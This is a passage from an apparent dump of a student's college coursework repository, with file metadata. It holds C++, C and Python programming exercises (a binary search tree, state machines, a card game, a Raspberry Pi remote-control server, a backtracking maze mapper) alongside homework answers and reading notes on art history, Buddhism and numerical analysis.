symbolism represents the ownership that men had over the wife. The symbolism extends into the eyes, as the single-sided or averted gaze is intended to portray a woman who is loyal, since direct eye contact at the time symbolized the woman's lack of purity. A woman who was assertive was seen as being a prostitute. The decorative dress and hair of the woman, along with the extra accessories, were a symbol of the woman's dowry. The intention of having large and eccentric dress was to show the status of women. While, technically, an image with a beautiful woman with a nice dowry does portray the idea of high status, the intent was to make the husband be seen as being part of the elite. In this sense, women are seen as being property, as ready-made cash. They are treated as both property and seen as something to be used by men as a card to elevate their own status. 
\n\n# Other things\n- Property\n- Dowry\n- Status\n- Idealization\n\n\n" }, { "alpha_fraction": 0.5758441686630249, "alphanum_fraction": 0.5774025917053223, "avg_line_length": 22.522293090820312, "blob_id": "e2e860c83abc69b813ee113631437a5c908ddbad", "content_id": "9e11171943312e87d203d72fe171bee18aa813fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3850, "license_type": "no_license", "max_line_length": 99, "num_lines": 157, "path": "/CSC 236 - Software Design/BST/BinarySearchTree-cpp.cpp", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "// Binary Search Tree\r\n// Created by Jan Pearce\r\n// Modified by Jesson Soto\r\n// Creates a binary search tree that is tranvsered in an order.\r\n// A16\r\n// Sotoventuraj\r\n\r\n#include<iostream>\r\nusing namespace std;\r\n\r\nclass BstNode\r\n{\r\n /* Creattes a BstNode class */\r\n public:\r\n int data;\r\n BstNode* left;\r\n BstNode* right;\r\n};\r\n\r\nBstNode* GetNewNode(int data)\r\n{\r\n /* Creates a new node. */\r\n\r\n BstNode* newNode = new BstNode();\r\n newNode->data = data;\r\n newNode->left = newNode->right = NULL;\r\n return newNode;\r\n}\r\n\r\nBstNode* insert(BstNode* head, int data)\r\n{\r\n /* Inserts a new node into the tree */\r\n\r\n if(head == NULL)\r\n {\r\n head = GetNewNode(data); // Base case\r\n }\r\n else if(data <= head->data)\r\n {\r\n head->left = insert(head->left, data); // Recursive case\r\n }\r\n\r\n else\r\n {\r\n head->right = insert(head->right, data);// Recursive case\r\n }\r\n return head;\r\n}\r\n\r\nvoid rawInput(BstNode** head_ptr){\r\n /* Takes in user input and lets them create a tree\r\n * Pre:\r\n * head_ptr - A pointer to the head, so that I can modify the head and\r\n * keep the void.\r\n * Post:\r\n * The head has been set to equal the top of the tree\r\n */\r\n\r\n // Ask the user for how many entries they have.\r\n int entries = 0;\r\n // Derefrence the head pointer.\r\n BstNode* head = *head_ptr;\r\n cout << \"How many entries would you like to make: \"<< endl;\r\n cin >> entries;\r\n\r\n // Get x number of inputs from the user.\r\n for(int i = 0; i < entries; i++){\r\n\r\n // Add the inputs to the tree.\r\n int input = 0;\r\n cin >> input;\r\n head = insert(head, input);\r\n }\r\n // Set the head equal to the new head.\r\n *head_ptr = head;\r\n}\r\n\r\nvoid in_order(BstNode* head){\r\n /* Prints the in order of the tree\r\n * Pre: Head - a BstNode that represents the root of the tree\r\n * Post: A in_order of the tree is printed out*/\r\n if (head->left != NULL){\r\n in_order(head->left); // Recursive case\r\n }\r\n if (head != NULL){\r\n cout << head->data << endl; // Base Case\r\n }\r\n if (head->right != NULL){\r\n in_order(head->right); // Recursive case\r\n }\r\n}\r\n\r\nvoid pre_order(BstNode* head){\r\n /* Prints the post order of the tree\r\n * Pre: Head - a BstNode that represents the root of the tree\r\n * Post: A post_order of the tree is printed out*/\r\n if (head != NULL){\r\n cout << head->data << endl; // Base Case\r\n }\r\n if (head->left != NULL){\r\n pre_order(head->left); // Recursive case\r\n }\r\n if (head->right != NULL){\r\n pre_order(head->right); // Recursive case\r\n }\r\n}\r\n\r\nvoid post_order(BstNode* head){\r\n /* Prints the post order of the tree\r\n * Pre: Head - a BstNode that represents the root of the tree\r\n * Post: A post_order of the tree is printed out*/\r\n if (head->left != NULL){\r\n post_order(head->left); // Recursive case\r\n }\r\n if (head->right != 
NULL){\r\n post_order(head->right); // Recursive case\r\n }\r\n if (head != NULL){\r\n cout << head->data << endl; // Base Case\r\n }\r\n}\r\n\r\nint main() {\r\n /* Allows a user to create a tree and then prints it out based on the formats that they choose */\r\n cout << \"Welcome this program builds trees and transverses them.\" << endl;\r\n BstNode* head = NULL;\r\n\r\n // Allow the user to input their text.\r\n rawInput(&head);\r\n\r\n // Ask the user if they want to print out a specific order.\r\n // Make sure that the head is not empty.\r\n string input = \"N\";\r\n if (head != NULL){\r\n cout << endl <<\"Show pre-order? Y o N\"<< endl;\r\n cin >> input;\r\n if(input == \"Y\"){\r\n pre_order(head);\r\n }\r\n input = \"N\";\r\n cout << endl<< \"Show in-order? Y o N\"<< endl;\r\n cin >> input;\r\n if(input == \"Y\"){\r\n in_order(head);\r\n }\r\n\r\n input = \"N\";\r\n cout << endl<< \"Show post-order? Y o N\"<< endl;\r\n cin >> input;\r\n if(input == \"Y\"){\r\n post_order(head);\r\n }\r\n }else{\r\n cout << \"Empty Tree\" << endl;\r\n }\r\n return 0;\r\n}\r\n" }, { "alpha_fraction": 0.6280737519264221, "alphanum_fraction": 0.6593237519264221, "avg_line_length": 26.478872299194336, "blob_id": "47c6518909ba0b4ea26d595847c7f0c0202255b4", "content_id": "040c9a76881b6c2fc666da25d7391641f07ee345", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1952, "license_type": "no_license", "max_line_length": 92, "num_lines": 71, "path": "/CSC 486 - Parallel and Distributed Systems/jacobi_cienfuegosj.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "#!/usr/bin/env\n# Javier Cienfuegos\n\n# Jacobi.py\n'''\nOpen the the file '1024x1024.jacobi.in'.\nRead the contents i.e dimensions and values.\nCreate a data structure with the same dimensions to store result\nStore the calculated values from the source structure to the new structure.\nCheck that the results of the previous iteration is the source for the next iteration.\nCreate an output file '1024x1024.jacobi.out'.\nWrite the dimensions and the resulting values into the file.\n'''\n\nimport sys\n\ndef jacobi(source,nIters):\n\n\tnumRows = len(source)\n\tnumCols = len(source[0])\n\tresult = [[0 for i in range(numRows)] for j in range(numCols)]\n\n\tfor j in range(numCols):\n\t\tresult[0][j] = source[0][j]\n\t\tresult[numCols-1][j] = source[numCols-1][j]\n\tfor i in range(numRows):\n\t\tresult[i][0] = source[i][0]\n\t\tresult[i][numRows-1] = source[i][numRows-1]\n\n\tswap = True\n\tfor i in range(nIters):\n\t\tfor i in range(1,numRows-1):\n\t\t\tfor j in range(1,numCols-1):\n\t\t\t\tif swap:\n\t\t\t\t\tresult[i][j] = 0.25*(source[i-1][j] + source[i+1][j] + source[i][j-1] + source[i][j+1])\n\t\t\t\telse:\n\t\t\t\t\tsource[i][j] = 0.25*(result[i-1][j] + result[i+1][j] + result[i][j-1] + result[i][j+1])\n\t\tswap = not(swap)\n\n\tif(nIters%2 == 0):\n\t\treturn result\n\telse:\n\t\treturn source\n\ndef main(argv):\n\n\tinFilename = sys.argv[1]\n\toutFilename = sys.argv[2]\n\n\twith open(inFilename) as inFile:\n\t\tcontent = inFile.readlines()\n\tnumRows = int(content[0].split(\" \")[0])\n\tnumCols = int(content[0].split(\" \")[1])\n\tsource = [[0 for i in range(numRows)] for j in range(numCols)]\n\n\tfor i in range(1,len(content)):\n\t\tfor j in range(numCols):\n\t\t\tcolelement = int(content[i].split(' ')[j])\n\t\t\tsource[i - 1][j] = colelement\n\tinFile.close()\n\n\tresult = jacobi(source=source,nIters=100)\n\n\twith open(outFilename,'w+') as 
outFile:\n\t\toutFile.write(\"{0} {1}\\n\".format(len(result),len(result[0])))\n\t\tfor row in result:\n\t\t\toutFile.write(' '.join(str(colval) for colval in row) + \"\\n\")\n\toutFile.close()\n\nif __name__ == '__main__':\n\tmain(sys.argv)\n\n" }, { "alpha_fraction": 0.7890625, "alphanum_fraction": 0.7900390625, "avg_line_length": 340.3333435058594, "blob_id": "6107c5737d4fd98b2fd19f0aabd24fb42fa91568", "content_id": "32e44cf28ab9e8bacd3a4649dd1805575a558790", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2048, "license_type": "no_license", "max_line_length": 1874, "num_lines": 6, "path": "/AST 260 - Buddhism/Buddist Wizard.md", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "# Summary\nIt is not typically possible to obtain enlightenment in a single life time. This was made hard due to the need to have the five limbs: faith, knowledge, sound body, and some other things. In particular, the changes in the human form have rendered it near impossible, disease, although certain steps can be taken which can extend the person's lifetime to beyond that of a typical human. This can be done through the use of elixars, that remove the person's dependence on unstable food. The elixars, are made of stable metals that will replace the fragile parts of the human body. However, these things are toxic, drinking mercury?. Anyways, the metals needed to be cooked before they could be consumed in a reasonable manner. It was also said that the Buddha claimed that anyone who was able to control their vital force would be able to live indefinitely. The buddha, decided to end his vital force three days in advance, that is why he died. This was done through the control of the four physic powers, which are will, effort, thought and wisdom. It is through control of these that a person can control their vital force. They also gain cool powers, like flying and stuff. Not sure at which point this occurs, but once one becomes a healer, they must heal all people. Also all healers are equal, regardless of the stage they are in. The next requirement is to have the merit, that is obtaining the ten perfections. Though they can only be obtained if the person's intentions are to reach nirvana, not to improve their future wealth. The latter is bad. Anyways, once a person is able to obtain patience and equanimity the other 8 are easy to obtain. With these 8, a person can obtain nirvana,by waiting until the passing of the buddha, at which point those close to nirvana will gain enlightenment. 
Though only some people will be able to see the two embers, and be awoken\n\n# Questions\n- So the actions must be done to go to nirvana?\n- The best one can obtain by doing good things in hope of a return is a life as a god or human again.\n" }, { "alpha_fraction": 0.5219836235046387, "alphanum_fraction": 0.5252215266227722, "avg_line_length": 29.623037338256836, "blob_id": "a33abade8c04c41e38340da8f939ef4d76f7e774", "content_id": "27bcf67241cef6e94fd83d48dc7d21acaeefe8f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5868, "license_type": "no_license", "max_line_length": 79, "num_lines": 191, "path": "/CSC 236 - Software Design/War/war.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "\"\"\" Created by Jesson Soto Ventura\n Creates a class that impements the War game,\n to keep everything in one area.\n\"\"\"\n\nimport random\nfrom deck import QueuedDeck, StackedDeck, Card\n\nclass War:\n\n def __init__(self, name):\n \"\"\" Initalize all the decks and variables for the game \"\"\"\n self.name = name\n\n # Set up the decks\n self.dealing_pile = StackedDeck()\n self.playing_AI = StackedDeck()\n self.playing_player = StackedDeck()\n self.storage_AI = QueuedDeck()\n self.storage_player = QueuedDeck()\n self.loot = QueuedDeck()\n\n # Inital setup\n self.initalize_game()\n self.running = True\n\n def initalize_game(self):\n \"\"\" Sets up the decks \n pre: Empty Decks\n post: Initalized Decks\n\n \"\"\"\n\n self.populate_deck()\n self.distribute_cards()\n \n def distribute_cards(self):\n \"\"\"distributes the cards to each player\n pre: a full dealing_pile\n post: an empty dealing_pile with 25 cards per playing\n \"\"\"\n\n # Split the cards up between users\n for i in range(25):\n card = self.dealing_pile.pop()\n self.playing_AI + card\n\n card = self.dealing_pile.pop()\n self.playing_player + card\n\n def populate_deck(self):\n \"\"\" Populates the deck with 50 cards\n and shuffles them.\n pre: Empty deck\n post: A deck with 50 shuffled cards\n \"\"\"\n\n # Fill the deck with 50 cards\n cards = list()\n for i in range(5):\n for j in range(10):\n card = Card(j)\n cards.append(card)\n\n # Shuffles the cards\n random.shuffle(cards)\n\n # Adds the cards to the dealing_pile\n for card in cards:\n self.dealing_pile + card\n\n def play(self):\n \"\"\" Plays a round until there is a winner\n pre: a none empty deck\n post: none\n \"\"\"\n\n # Check to make sure that the deck is not empty\n self.check_deck()\n\n # Check to make sure that no winner has happend\n if self.running:\n player_card, AI_card = self.draw()\n\n # Check the winner\n if player_card != AI_card:\n if player_card > AI_card:\n print(\"Player \" + self.name + \" won!\")\n self.get_loot(self.storage_player)\n else:\n print(\"Player AI won!\")\n self.get_loot(self.storage_AI)\n else:\n # Burn two cards due to draw\n self.check_deck()\n if self.running:\n player_card, AI_card = self.draw()\n print(\"The cards were burned\")\n\n # Start over\n self.play()\n\n\n\n def draw(self):\n \"\"\" Draws a card for each player\n pre: a none empty deck\n post: two cards are returned\n \"\"\"\n\n # Draw two cards\n player_card = self.playing_player.pop()\n AI_card = self.playing_AI.pop()\n\n # Print the cards that are drawn\n print(\"Player \" + self.name + \" drew \" + str(player_card))\n print(\"Player AI drew \" + str(AI_card))\n\n # Add the cards as loot randomly pick one to add to the top, to prevent\n # neverending games.\n cards = [player_card, 
AI_card]\n random.shuffle(cards)\n self.add_loot(cards[0])\n self.add_loot(cards[1])\n\n return (player_card, AI_card)\n\n def get_loot(self, storage):\n \"\"\" Adds the loot pile to the player's storage\n pre: a none empty loot pile\n post: loot is added to the player's storage\n \"\"\"\n\n # Adds the loot to the player's storage\n for i in range(self.loot.size()):\n card = self.loot.dequeue()\n storage + card \n\n def check_deck(self):\n \"\"\" Check the deck state\n pre: an initalized deck\n \"\"\"\n # Check to see if any player has an empty deck\n # if they do they loose.\n if self.playing_player.size() == 0:\n # Either refill the deck or make them winner\n if self.storage_player.size() == 0:\n print (\"Player AI is the winner\")\n self.running = False\n else:\n print (\"Player \" + self.name + \" must refill deck\")\n self.refill_deck(self.playing_player, self.storage_player)\n\n # Check to see if any player has an empty deck\n # if they do they loose.\n if self.playing_AI.size() == 0 and self.running:\n # Either refill the deck or make them winner\n if self.storage_AI.size() == 0:\n print (\"Player \" + self.name + \" is the winner\")\n self.running = False\n else:\n print (\"Player AI must refill deck\")\n self.refill_deck(self.playing_AI, self.storage_AI)\n\n def refill_deck(self, playing_deck, storage):\n \"\"\" Refills the players playing deck from the storage\n pre: an empty playing\n post: an empty storage and full playing \n \"\"\"\n # Fill thier playing deck with thier storage deck\n for i in range(storage.size()):\n card = storage.dequeue()\n playing_deck.add(card)\n\n def add_loot(self, card):\n \"\"\" Adds cards to the loot pile\n pre: a card\n post: the card is added to the loot pile\n \"\"\"\n # Adds a card to the loot\n self.loot + card\n\n def game(self):\n \"\"\" Implements the actual game.\n pre: initalized_decks\n post: a winner\n \"\"\"\n # Run the game until a winner is had.\n while self.running:\n # Play a single round\n self.play()\n \n\n\n\n\n\n\n" }, { "alpha_fraction": 0.5691056847572327, "alphanum_fraction": 0.5691056847572327, "avg_line_length": 16.571428298950195, "blob_id": "1ce269fbcca670093a99e44b5da23809e9b88769", "content_id": "9646870aefecfebd4fe2f8154a8db8d90bd21005", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 369, "license_type": "no_license", "max_line_length": 50, "num_lines": 21, "path": "/CSC 236 - Software Design/War/game.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "\"\"\" Created by Jesson Soto\n Uses the war class to start the game.\n The driver.\n\"\"\"\n\nfrom war import War\n\ndef main():\n \"\"\" Starts the game of War\n pre: None\n post: A winner for the game\n \"\"\"\n \n # Ask the user for thier name\n player_name = raw_input(\"What's your name?\\n\")\n\n # Start Game\n war = War(player_name)\n war.game()\n\nmain()\n" }, { "alpha_fraction": 0.581134557723999, "alphanum_fraction": 0.5883905291557312, "avg_line_length": 25.59649085998535, "blob_id": "da9cc63a3d0d708d9e7952daf92d165eaa80713d", "content_id": "b4eed15f2f0440dc4c589a3d1d55bc30a8c94250", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1516, "license_type": "no_license", "max_line_length": 83, "num_lines": 57, "path": "/CSC 386 - Embedded Systems/C_Basic/State_Machine_2/all_a.c", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <stdlib.h>\n#include 
<stdbool.h>\n#include <unistd.h>\n\n#define READING_A 0\n#define READING_B 1\nbool is_valid_character(char character){\n /* Check to see if the characters read are valid */\n if (character == 'a' || character == 'b'){\n return true;\n }else{\n return false;\n }\n}\nint main(int argc, char* argv[]){\n /* single a followed by more as\n * uses a string given by user\n */\n if (argc < 2){\n printf(\"Please use with a string: ./a.out string example ./a.out textbased\\n\");\n return -1;\n }\n\n char* input_string = argv[1];\n int index = 0;\n int state = READING_A;\n char character = input_string[0];\n // Read the entire string until the null byte\n while(character != '\\0'){\n if(is_valid_character(character)){\n /* Tansition from READING_A to READING_B when a b is read */\n switch(state){\n case READING_A:\n if(character == 'b'){\n state = READING_B;\n printf(\"Accepted %c transitioning to Reading B\\n\", character);\n }else{\n printf(\"Accepted %c\\n\", character);\n }\n break;\n case READING_B:\n printf(\"Rejecting %c\\n\", character);\n return 0; \n }\n // Keep track of the character being read.\n index += 1;\n character = (char) input_string[index];\n }else{\n /* Invalid Chacracters have been read */\n printf(\"Invalid Character\\n\");\n return -1;\n }\n }\n // Print out the string once its done.\n printf(\"Accepted %s\\n\", input_string);\n}\n" }, { "alpha_fraction": 0.5558874011039734, "alphanum_fraction": 0.604522168636322, "avg_line_length": 27.9135799407959, "blob_id": "1c93f450bcf88d847d16a5dfc203fba7ff69eaa5", "content_id": "03f601e820a31d6138fc29cb92490586055ae937", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2344, "license_type": "no_license", "max_line_length": 88, "num_lines": 81, "path": "/CSC 386 - Embedded Systems/RC-Nespi/server.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "import serial\nimport RPi.GPIO as GPIO\nimport socket\n\ndef pi_RC_controller(reading, LEFT, RIGHT, FORWARD, BACKWARD):\n ''' Sets the approprate pins to high or to low depending on the user's input.\n High means that it will move a motor low means that it will not.\n '''\n\n # Mask out uneccessary bits to determine if a particular direction is bing selected.\n if (reading & 0b00000001) == 0:\n print(\"A\")\n if (reading & 0b00000010) == 0:\n print(\"B\")\n if (reading & 0b00000100) == 0:\n print(\"SELECT\")\n if (reading & 0b00001000) == 0:\n print(\"START\")\n if (reading & 0b00010000) == 0:\n GPIO.output(FORWARD, GPIO.HIGH)\n print(\"UP\")\n if (reading & 0b00100000) == 0:\n print(\"DOWN\")\n GPIO.output(BACKWARD, GPIO.HIGH)\n if (reading & 0b01000000) == 0:\n print(\"LEFT\")\n GPIO.output(LEFT, GPIO.HIGH)\n if (reading & 0b10000000) == 0:\n GPIO.output(RIGHT, GPIO.HIGH)\n print(\"RIGHT\")\n if (reading == 0b11111111):\n print(\"STOPPED\")\n GPIO.output(LEFT, GPIO.LOW)\n GPIO.output(RIGHT,GPIO.LOW)\n GPIO.output(BACKWARD, GPIO.LOW)\n GPIO.output(FORWARD,GPIO.LOW)\n\ndef server():\n ''' Set up the server.\n Also configures all the pins that will be used\n '''\n\n # Sets all pins to low and uses them as output pins.\n GPIO.setmode(GPIO.BOARD)\n\n RIGHT = 37\n LEFT = 35\n FORWARD = 40\n BACKWARD = 38\n\n GPIO.setup(RIGHT,GPIO.OUT)\n GPIO.setup(LEFT, GPIO.OUT)\n GPIO.setup(BACKWARD, GPIO.OUT)\n GPIO.setup(FORWARD,GPIO.OUT)\n\n\n # Setup the port being used and the ip connecting to.\n port = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n ip = \"192.168.0.0\"\n port_number = 8898\n port.bind( (ip, 
port_number))\n port.listen(1)\n\n # Display information about the user who connected to the port.\n connection, address = port.accept()\n print (\"Connected by: \" + str(address))\n try:\n # Read the data as it comes in and interpret it into an action.\n while True:\n data = connection.recv(512)\n reading = int(data)\n pi_RC_controller(reading, LEFT,RIGHT,FORWARD,BACKWARD)\n # Make sure to close the port\n finally:\n port.close()\n\n\n\n# read_controller(\"/dev/ttyUSB0\")\nif __name__ == \"__main__\":\n server()\n\n\n" }, { "alpha_fraction": 0.650628387928009, "alphanum_fraction": 0.7368043065071106, "avg_line_length": 34.69230651855469, "blob_id": "45373448b02fcfbbac46b32c914feebdc3f99237", "content_id": "a655fd59c13ef484aeb11a82507d77315db9ef8f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2785, "license_type": "no_license", "max_line_length": 274, "num_lines": 78, "path": "/MAT 433 - Numberical Analysis/HW_4/HW.md", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "# 1\n## A\nFloating point - A notation where scientific notation is used to express large numbers\n## B\nmantissa - The portion of scientific notation that holds the value, not the exponent \n## C\nn-bit number - A notation where n bits are used to represent a number using floating point notation adjusted to n bits.\n\n# 2\n## A\n0.1\n0.2\n0.3\n0.4\n0.5\n0.6\n0.7\n0.8\n0.9\nSTOP\n## B\nX = 1.1\n## C\nNo they are not the same due to the lack of precision of 0.1, when converted to binary. When the binary representation is added to 0.9, it creates a value slightly less than 1.0 in binary, so the loop is not terminated until 1.1, where the value is largest.\n\n# 3\n## A\n171\n## B\n138\n## C\nThe result is NaN, since the value of the factorial is very large, near inf. This near inf value can not be exact due to the computer's limitations. So dividing by a large number gives a near zero value. The computer rounds to zero and dividing by zero causes an error Nan. \n\n#4 \n## A\n5.1857 * 10^21\n## B \nThe value after a certain value remains the same for all large values. In this case around n=90 the value remains the same at 5.1847 * 10 ^ 21, this value is the same at n=200 as n=300. Showing that at large values the value of the next ,n, is near zero.\n##C \nThe program reaches the same value, when in the typical short form output, but as for each n value over 90 the longer format gives a value that is more accurate then a lower n. Also by using the nested form we can go to values of n that are much higher. \n\n#5\n##A \n```\noctave:4> diff_quote(1,0.1)\nans = 2.10000000000000\noctave:5> diff_quote(1,0.01)\nans = 2.01000000000000\noctave:6> diff_quote(1,0.001)\nans = 2.00099999999970\noctave:7> diff_quote(1,0.0001)\nans = 2.00009999999917\noctave:8> diff_quote(1,0.00001)\nans = 2.00001000001393\noctave:9> diff_quote(1,0.000001)\nans = 2.00000099992437\noctave:10> diff_quote(1,0.0000001)\nans = 2.00000010108781\n```\n##B \n\n```\nf(x) = x^2\nf`(x) = 2x\nf`(1) = 2\n```\nAnalytically the result should be 2, though solving numerically gives a value with an error. This error becomes smaller as h becomes smaller. 
So the smallest error would occur at the smallest value of h, so it would be 10^-16\n\n##C \nThe error for both large and small values of h is the rounding that occurs as a result of the inaccuracies of storing the value of h.\n\n\n#6\n##B\nThe value of the noise and the error are about the same around 0.4-0.6. On values beyond 0.6 the error is larger than the original noise. The error is smaller than the noise at values before 0.4 \n\n##C \nThe derivative of the function is the most influential property as, depending on the slope of the graph, the slight change in x will determine the magnitude of the difference between the error and noise. A large slope equals a large magnitude; otherwise, a small difference.\n\n" }, { "alpha_fraction": 0.7966805100440979, "alphanum_fraction": 0.7966805100440979, "avg_line_length": 420.75, "blob_id": "400b2ec6e155bf6f8b27bf3eb95a13ec37892bab", "content_id": "ad6276baf53c2bd26b9244d6db41648f9889e9f1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1687, "license_type": "no_license", "max_line_length": 1564, "num_lines": 4, "path": "/AST 260 - Buddhism/TheAdvicetoLaymanTundila.md", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "A wealthy man was moved to give alms to a group of Buddhist monks. The monks receiving the alms were very grateful; in particular, a Buddha was very pleased with the man's decision to create a porch and give the alms. So he decided to give the man some advice. He told him that generosity was an important concept and that his generosity could help him attain nirvana. He also told him that morality is what prevented him from entering hell; he was born a human on account of his moral character. If he continues to be moral, he could be born into a higher plane of existence. The Buddha goes on to explain what it means to be moral. He discusses: avoid drinking, dancing, eat only at the right time, and other points. The intention of the section is that one must follow all these to enter the different heavens. Here a Buddha says that there are various levels of gods, with each level having gods that live longer than the last. In these worlds the gods have everything that they desire, though their lives are impermanent, and by living in these wonderful places they are slowly gaining back their desires, so when they die they go back to a lesser realm. Also desire is bad; desire seemed like the most important part of morality, as he relates it to many negative images. He says that desire causes suffering, which later causes the sufferer to be born into hell. Finally, for all the errors one commits, one can renounce them by following the ten precepts, and by following them one gains peace. 
The buddha by instilling in them the truth made them arhats.\n\n# Writing topics:\n- Talks about moarlity putting people in high noble roles when reborn, what does this say of the poor.\n" }, { "alpha_fraction": 0.5561970472335815, "alphanum_fraction": 0.5608159899711609, "avg_line_length": 27.549449920654297, "blob_id": "d7335b2eb2bae4c53b476fac48c83738c08fdfda", "content_id": "ccc50cfaaea2065012b3d001b1438729c4292533", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 2598, "license_type": "no_license", "max_line_length": 89, "num_lines": 91, "path": "/CSC 386 - Embedded Systems/C_Basic/State_Machine_2/a+b+c.c", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <stdlib.h>\n#include <stdbool.h>\n#include <unistd.h>\n\n#define WAITING_A 0\n#define READ_A 1\n#define READING_B 2\n#define READING_C 3\n\nint reject( char character, char* string){\n // Print the correct text once a reject state is met\n printf(\"Rejecting %c\\n\", character);\n printf(\"Rejected %s\\n\", string);\n return -1;\n}\n\nbool is_valid_character(char character){\n /* Check to see if the characters read are valid */\n if (character == 'a' || character == 'b' || character == 'c'){\n return true;\n }else{\n return false;\n }\n}\nint main(int argc, char* argv[]){\n /* single a followed by many bs followed by many cs\n * takes in a string from the user\n */\n if (argc < 2){\n printf(\"Please use with a string: ./a.out string example ./a.out textbased\\n\");\n return -1;\n }\n\n char* input_string = argv[1];\n int index = 0;\n int state = WAITING_A;\n bool at_least_one = false;\n char character = input_string[0];\n\n // Read the entire string until the null byte\n while(character != '\\0'){\n if(is_valid_character(character)){\n switch(state){\n /* Tansition from WAITING_A to READING_A and then b then c when a, b ,c is read */\n case WAITING_A:\n if (character == 'a'){\n state = READ_A;\n printf(\"Accepted %c transitioning to Read A\\n\", character);\n }else{\n return reject(character, input_string);\n }\n break;\n case READ_A:\n if (character == 'b'){\n state = READING_B;\n printf(\"Accepted %c transitioning to Reading B\\n\", character);\n }else if (character == 'a'){\n printf(\"Accepted %c\\n\", character);\n }else{\n return reject(character, input_string);\n }\n break;\n case READING_B:\n if (character == 'c'){\n state = READING_C;\n printf(\"Accepted %c transitioning to Reading C\\n\", character);\n }else if (character == 'b'){\n printf(\"Accepted %c\\n\", character);\n }else{\n return reject(character, input_string);\n }\n break;\n case READING_C:\n if (character == 'c'){\n printf(\"Accepted %c\\n\", character);\n }else{\n return reject(character, input_string);\n }\n break;\n }\n // Keep track of the character being read.\n index += 1;\n character = (char) input_string[index];\n }else{\n return reject(character, input_string);\n }\n }\n // Print out the string once its done.\n printf(\"Accepted %s\\n\", input_string);\n}\n" }, { "alpha_fraction": 0.5602552890777588, "alphanum_fraction": 0.5639655590057373, "avg_line_length": 28.946666717529297, "blob_id": "ffa97a80c4e1fa205eea4d8c5f4af193384ff8b9", "content_id": "e64ba42b06644512dd0b7461fdd42a0c5b332965", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6738, "license_type": "no_license", "max_line_length": 98, "num_lines": 225, "path": "/CSC 236 - Software 
Design/Backtracking/sotoventura-csc236L02/map.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "\"\"\" Created by Jesson Soto Ventura\n To map out the location of all treasure in a map\n\"\"\"\nimport curses\nimport time\nfrom random import choice\nfrom copy import deepcopy\nfrom backtracking import Backtrack\n\nwindow = None \npoints = dict()\n\ndef draw_map( cave_file):\n \"\"\" Load the given map into a buffer.\n pre:\n None\n post: The screen will have the map drawn out.\n The x, y of the starting point will be returned.\n \"\"\"\n dimensions = cave_file.readline();\n start_y, start_x = window.getyx()\n for yi, line in enumerate(cave_file):\n line = line.translate(None, ' ')\n window.addstr(line)\n for xi, character in enumerate(line):\n points[(yi, xi)] = character\n if 'M' in line:\n y , x = window.getyx()\n start_y, start_x = window.getyx()\n start_y = y - 1 \n start_x = line.index('M')\n points[(start_y, start_x)] = \"S\"\n window.move(y,x)\n window.refresh()\n\n window.move(start_y,start_x)\n window.refresh()\n return dimensions\n\ndef main():\n\n # Get the file\n filename = raw_input(\"What is the name of cave file: \")\n cave_file = open(filename, \"r\")\n\n # Setup curses\n global window \n window = curses.initscr()\n curses.noecho()\n # window.curs_set(1)\n window.erase()\n window.refresh()\n \n # Draw the map\n dimensions = draw_map(cave_file).split(\" \")\n open_spaces = find_open_spaces(\"B\")\n track = Backtrack()\n visit = set()\n move(track, visit, \"B\")\n window.addstr(int(dimensions[1]), int(dimensions[0]),\"Press a key to end\")\n key = window.getch()\n\ndef move(track, visited, cf):\n \"\"\" Move one space NEWS or turns around.\n Pre: A stack to keep track of previous motions\n a set of previously atteded spaces\n the direction moved to get to the current_space\n Post:\n The character will move to the next open space or return that it could not\n \"\"\"\n\n # Get open spots\n open_spaces = find_open_spaces(cf)\n y,x = window.getyx()\n\n # Move to every open free space\n for space in open_spaces:\n\n # Pause so that its possible to see the mostion\n time.sleep(0.02)\n current_space = (y,x,space)\n\n # For not viseted spaces add them to the list and check for gold\n if current_space not in visited:\n visited.add(current_space)\n invert = opposite_direction(space)\n\n # On gold draw a path\n if points[(y,x)] == \"T\":\n track_copy = track.get_copy()\n draw_path(track_copy)\n\n # Add the motion to the stack\n track.push(current_space)\n advance(space)\n move(track,visited, invert)\n else:\n # Move back, since there are no new spots[]\n old_spot = track.pop()\n inverse = opposite_direction(old_spot[2])\n advance(inverse)\n return None\n else:\n if track.size() > 0:\n # Move back, since there are no new spots[]\n old_spot = track.pop()\n inverse = opposite_direction(old_spot[2])\n advance(inverse)\n return None\n\n \ndef draw_path(track):\n \"\"\" Draw a path to a given point, based on the stack given\n Pre: A none empty stack\n post: The window wiiwll have a path to the T\"\"\"\n\n y, x = window.getyx()\n counter = 0;\n\n # Pop until the base is reached.\n while track.size() > 0:\n counter += 1\n current_space = track.pop()\n c_x = current_space[1]\n c_y = current_space[0]\n move_direction = opposite_direction(current_space[2])\n\n # Pick the symbol used based on the direction of motion.\n if 